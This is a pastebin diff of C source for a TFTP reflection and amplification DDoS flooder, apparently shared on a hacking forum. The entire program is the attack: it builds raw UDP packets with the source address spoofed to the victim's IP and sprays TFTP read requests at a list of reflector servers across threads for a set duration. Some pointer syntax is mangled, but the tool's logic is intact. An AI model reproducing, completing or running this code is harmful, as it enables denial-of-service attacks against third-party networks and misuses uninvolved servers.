View difference between Paste ID: <a href="/357cw1qH">357cw1qH</a> and <a href="/De6amhpb">De6amhpb</a>

/* NEW TFTP DDoS AMPLIFICATION METHOD. */
1		/* NEW TFTP DDoS AMPLIFICATION METHOD. */
2	-	/* Greetz: HackForums.net */
2	+
3	-
3	+
4		#include <unistd.h>
5		#include <stdio.h>
6		#include <stdlib.h>
7		#include <string.h>
8		#include <sys/socket.h>
9		#include <netinet/ip.h>
10		#include <netinet/udp.h>
11		#include <arpa/inet.h>
12		#define MAX_PACKET_SIZE 8192
13		#define PHI 0x9e3779b9
14		static uint32_t Q[4096], c = 362436;
15		struct list
16		{
17		struct sockaddr_in data;
18		struct list *next;
19		struct list *prev;
20		};
21		struct list *head;
22		volatile int tehport;
23		volatile int limiter;
24		volatile unsigned int pps;
25		volatile unsigned int sleeptime = 100;
26		struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
27		void init_rand(uint32_t x)
28		{
29		int i;
30		Q[0] = x;
31		Q[1] = x + PHI;
32		Q[2] = x + PHI + PHI;
33		for (i = 3; i < 4096; i++)
34		{
35		Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
36		}
37		}
38		uint32_t rand_cmwc(void)
39		{
40		uint64_t t, a = 18782LL;
41		static uint32_t i = 4095;
42		uint32_t x, r = 0xfffffffe;
43		i = (i + 1) & 4095;
44		t = a * Q[i] + c;
45		c = (t >> 32);
46		x = t + c;
47		if (x < c) {
48		x++;
49		c++;
50		}
51		return (Q[i] = r - x);
52		}
53		unsigned short csum (unsigned short *buf, int nwords)
54		{
55		unsigned long sum = 0;
56		for (sum = 0; nwords > 0; nwords--)
57		sum += *buf++;
58		sum = (sum >> 16) + (sum & 0xffff);
59		sum += (sum >> 16);
60		return (unsigned short)(~sum);
61		}
62		void setup_ip_header(struct iphdr *iph)
63		{
64		iph->ihl = 5;
65		iph->version = 4;
66		iph->tos = 0;
67		iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 14;
68		iph->id = htonl(54321);
69		iph->frag_off = 0;
70		iph->ttl = MAXTTL;
71		iph->protocol = IPPROTO_UDP;
72		iph->check = 0;
73		iph->saddr = inet_addr("192.168.3.100");
74		}
75		void setup_udp_header(struct udphdr *udph)
76		{
77		udph->source = htons(5678);
78		udph->dest = htons(69);
79		udph->check = 0;
80		memcpy((void *)udph + sizeof(struct udphdr), "\x00\x01\x2f\x78\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00", 14);
81		udph->len=htons(sizeof(struct udphdr) + 14);
82		}
83		void flood(void par1)
84		{
85		struct thread_data td = (struct thread_data )par1;
86		char datagram[MAX_PACKET_SIZE];
87		struct iphdr iph = (struct iphdr )datagram;
88		struct udphdr udph = (/u_int8_t/void )iph + sizeof(struct iphdr);
89		struct sockaddr_in sin = td->sin;
90		struct list *list_node = td->list_node;
91		int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
92		if(s < 0){
93		fprintf(stderr, "Could not open raw socket.\n");
94		exit(-1);
95		}
96		init_rand(time(NULL));
97		memset(datagram, 0, MAX_PACKET_SIZE);
98		setup_ip_header(iph);
99		setup_udp_header(udph);
100		udph->source = htons(rand() % 65535 - 1026);
101		iph->saddr = sin.sin_addr.s_addr;
102		iph->daddr = list_node->data.sin_addr.s_addr;
103		iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
104		int tmp = 1;
105		const int *val = &tmp;
106		if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
107		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
108		exit(-1);
109		}
110		init_rand(time(NULL));
111		register unsigned int i;
112		i = 0;
113		while(1){
114		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
115		list_node = list_node->next;
116		iph->daddr = list_node->data.sin_addr.s_addr;
117		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
118		iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
119
120		pps++;
121		if(i >= limiter)
122		{
123		i = 0;
124		usleep(sleeptime);
125		}
126		i++;
127		}
128		}
129		int main(int argc, char *argv[ ])
130		{
131		if(argc < 6){
132		fprintf(stderr, "Invalid parameters!\n");
133		fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
134		exit(-1);
135		}
136		srand(time(NULL));
137		int i = 0;
138		head = NULL;
139		fprintf(stdout, "Setting up sockets...\n");
140		int max_len = 128;
141		char buffer = (char ) malloc(max_len);
142		buffer = memset(buffer, 0x00, max_len);
143		int num_threads = atoi(argv[4]);
144		int maxpps = atoi(argv[5]);
145		limiter = 0;
146		pps = 0;
147		int multiplier = 20;
148		FILE *list_fd = fopen(argv[3], "r");
149		while (fgets(buffer, max_len, list_fd) != NULL) {
150		if ((buffer[strlen(buffer) - 1] == '\n') \|\|
151		(buffer[strlen(buffer) - 1] == '\r')) {
152		buffer[strlen(buffer) - 1] = 0x00;
153		if(head == NULL)
154		{
155		head = (struct list *)malloc(sizeof(struct list));
156		bzero(&head->data, sizeof(head->data));
157		head->data.sin_addr.s_addr=inet_addr(buffer);
158		head->next = head;
159		head->prev = head;
160		} else {
161		struct list new_node = (struct list )malloc(sizeof(struct list));
162		memset(new_node, 0x00, sizeof(struct list));
163		new_node->data.sin_addr.s_addr=inet_addr(buffer);
164		new_node->prev = head;
165		new_node->next = head->next;
166		head->next = new_node;
167		}
168		i++;
169		} else {
170		continue;
171		}
172		}
173		struct list *current = head->next;
174		pthread_t thread[num_threads];
175		struct sockaddr_in sin;
176		sin.sin_family = AF_INET;
177		sin.sin_addr.s_addr = inet_addr(argv[1]);
178		struct thread_data td[num_threads];
179		for(i = 0;i<num_threads;i++){
180		td[i].thread_id = i;
181		td[i].sin= sin;
182		td[i].list_node = current;
183		pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
184		}
185		fprintf(stdout, "Starting flood...\n");
186		for(i = 0;i<(atoi(argv[6])*multiplier);i++)
187		{
188		usleep((1000/multiplier)*1000);
189		if((pps*multiplier) > maxpps)
190		{
191		if(1 > limiter)
192		{
193		sleeptime+=100;
194		} else {
195		limiter--;
196		}
197		} else {
198		limiter++;
199		if(sleeptime > 25)
200		{
201		sleeptime-=25;
202		} else {
203		sleeptime = 0;
204		}
205		}
206		pps = 0;
207		}
208		return 0;
209		}